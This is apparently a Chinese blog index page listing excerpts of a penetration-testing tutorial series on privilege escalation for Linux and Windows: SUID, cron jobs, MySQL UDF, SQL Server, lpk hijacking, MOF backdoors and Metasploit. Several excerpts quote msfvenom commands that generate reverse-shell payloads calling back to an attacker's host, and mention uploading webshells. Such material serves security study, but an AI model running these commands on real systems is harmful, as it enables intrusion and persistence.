第十七节 msf结合漏洞审计工具进行提权
摘要:1. Windows补丁审计工具 在终端下可以使用命令systeminfo查看系统的信息(尤其是漏洞补丁信息)。 Windows补丁检测Windows-Exploit-Suggester: https://github.com/GDSSecurity/Windows-Exploit-Suggeste
阅读全文
posted @
2021-08-18 18:32
EndlessShw
阅读(153)
推荐(0) 编辑
第十六节 Metasploit Linux提权
摘要:1. 获得反弹shell 区别于Windows,Linux因为exe不是可执行文件,所以要换其他的方法。 生成反弹shell的php: msfvenom -p php/meterpreter_reverse_tcp LHOST=本地IP LPORT=12345 -f raw > /var/www/h
阅读全文
posted @
2021-08-16 18:02
EndlessShw
阅读(772)
推荐(0) 编辑
第十五节 meteasploit windows提权
摘要:1. 常见的提取板块 metasploit提权EXP存储文件夹路径: usr/share/metasploit-framework/modules/exploits/windows/local#windows:windows/local Windows常见的提权模块: ms14_058 内核模式驱动
阅读全文
posted @
2021-08-16 17:18
EndlessShw
阅读(82)
推荐(0) 编辑
第十四节 FileZilla提权
摘要:1. 简介 FileZilla是一个ftp服务器,假如配置不严的,就可以读取xml文件内容(包含用户的信息和管理信息)执行一些简单的命令。 默认的安装目录:C:\Program Files\FileZilla Server\ 包含敏感信息的两个文件为:FileZilla Server.xml和Fil
阅读全文
posted @
2021-08-16 13:06
EndlessShw
阅读(188)
推荐(0) 编辑
第十三节 zend反弹shell提权
摘要:1. 漏洞利用过程 msfconsole生成反弹shell: msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的ip port=端口 -f exe > /var/www/html/shell.exe 在其中一个dos框中进行监听: use
阅读全文
posted @
2021-08-14 16:58
EndlessShw
阅读(62)
推荐(0) 编辑
第十二节 zend提权
摘要:1. 简介 在php里面有一个扩展是zend,这个是用解析php zend脚本加密文件。 如果服务器安装了zend,如果ZendExtensionManager.dll 权限可以修改,那就可以用其他dll替换这dll文件。即如果php装了Zend插件 就要查看这个目录的ZendExtensionMa
阅读全文
posted @
2021-08-13 18:36
EndlessShw
阅读(86)
推荐(0) 编辑
第十一节 mof提取(一般用来留后门
摘要:1. mof 托管对象格式 (MOF) 文件是创建和注册提供程序、事件类别和事件的简便方法。在 MOF 文件中创建类实例和类定义后,可以对该文件进行编译。编译 MOF 文件将在 CIM 储存库中注册所有的类定义和实例。之后,提供程序、事件类别和事件信息便可由 便可由 WMI 和 Visual Stu
阅读全文
posted @
2021-08-13 17:57
EndlessShw
阅读(272)
推荐(0) 编辑
第十节 lpk劫持提权
摘要:1. 简介 lpk劫持发生在Windows2003或者xp中。如果同一个目录中存在exe和lpk.dll。每当exe执行的时候就会被劫持。利用这个特性可以把lpk提权的文件放到权限较高的程序,当exe运行时,lpk.dl就可以进行提权。 2. 提权工具 Tools Lpk Sethc v4 这个工具
阅读全文
posted @
2021-08-13 14:03
EndlessShw
阅读(397)
推荐(0) 编辑
第九节 winserver2008 r2 溢出提权
摘要:1. 简介 在winserver2008 r2中,服务器默认是支持aspx的。所以默认都是可以执行一些命令。如果没有进行补丁修复可以利用一些溢出提权工具进行提权。 2. CVE-2014-4113-Exploit 利用该提取工具对winserver2008进行溢出提权。 3. 利用过程 通过aspx
阅读全文
posted @
2021-08-13 12:43
EndlessShw
阅读(352)
推荐(0) 编辑
第八节 SQL server提权
摘要:1. 简介 如果网站里面使用的数据库是SQL server,那么如果找到sa的密码,利用提权脚本来执行命令,但是不一定是系统权限,还要看管理员开始安装SQL server时给予其的权限设置 2. 查找账号和密码 一般会存放账号密码的地方: web.config config.asp conn.asp
阅读全文
posted @
2021-08-11 18:18
EndlessShw
阅读(159)
推荐(0) 编辑
第七节 Windows溢出提权(aspx)
摘要:1. 简介 aspx程序比asp的权限高,默认是可以执行cmd命令。如果asp不能执行命令且服务器支持aspx上传,那么我们可以上传aspx程序到网站上进行提权。 2. 进行提权 首先上传aspx马(密码为admin)。 因为aspx马可以执行命令,所以这里直接上传提权工具即可
阅读全文
posted @
2021-08-11 13:41
EndlessShw
阅读(124)
推荐(0) 编辑
第六节 Windows溢出提权(asp)
摘要:1. 简介 Windows服务器中,常用的一般是win2003,win2008,win2012 在渗透测试中 ,我们获取的权限是iis_user用户组 ,要更高的权限就需要把当前的用户提权到系统用户或超级管理员用户组。更高的权限方便我们在后续的渗透中,扩大范围测试。 2. 程序权限的对比 在iis里
阅读全文
posted @
2021-08-11 13:10
EndlessShw
阅读(167)
推荐(0) 编辑
第五节 Linux Cron Jobs 提权
摘要:1. 原理和利用 Cron Jobs 计划任务。通过/etc/crontab文件,可以设定系统定期执行的任务。但crontab文件只能是root权限进行编辑。当我们以普通权限远程登录用户的时候,查看/etc/crontab文件内容,如果存在就可以尝试利用。 Crontab 语法: * * * * *
阅读全文
posted @
2021-08-10 15:42
EndlessShw
阅读(318)
推荐(0) 编辑
第四节 MySQL UDF 提权
摘要:1. 定义 在MySQL中可以使用自定义函数进行提权,udf为user defined function 即用户自定义函数。 对于用户自定义的函数,在MySQL5.1版本以后就需要放在插件目录/lib/plugin中(默认不存在),文件后缀为dill,c语言编写。 [提权]mysql中的UDF提权
阅读全文
posted @
2021-08-09 17:16
EndlessShw
阅读(61)
推荐(0) 编辑
第三节 GNU C library 动态链接区 $ORIGIN 溢出提权(
摘要:1. 名词解释 The GNU C Library: The GNU C Library project provides the core libraries for the GNU system and GNU/Linux systems, as well as many other syste
阅读全文
posted @
2021-08-09 13:27
EndlessShw
阅读(188)
推荐(0) 编辑
第二节 Linux SUID提权
摘要:1. 定义 SUID是一种特殊的文件属性,它允许用户执行的文件以该文件的拥有者的身份运行。 SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限(仅对拥有执行权限的二进制程序有效)。例如,所有用户都可以执行passwd命令来修改自己的用户密码,而用户密码保存在/e
阅读全文
posted @
2021-08-07 18:01
EndlessShw
阅读(131)
推荐(0) 编辑
第一节 Linux内核提权
摘要:1. 提权的定义 通常我们在拥有一个webshell的时候,一般权限都是WEB容器权限,如在iis就是iis用户组权限,在apache 就是apache权限,一般都是权限较低,均可执行一些普通命令,如查看当前用户,网络信息,ip信息等。如果我想进行内网渗透就必须将权限提权到最高,如系统权限 超级管理
阅读全文
posted @
2021-08-07 13:32
EndlessShw
阅读(218)
推荐(0) 编辑
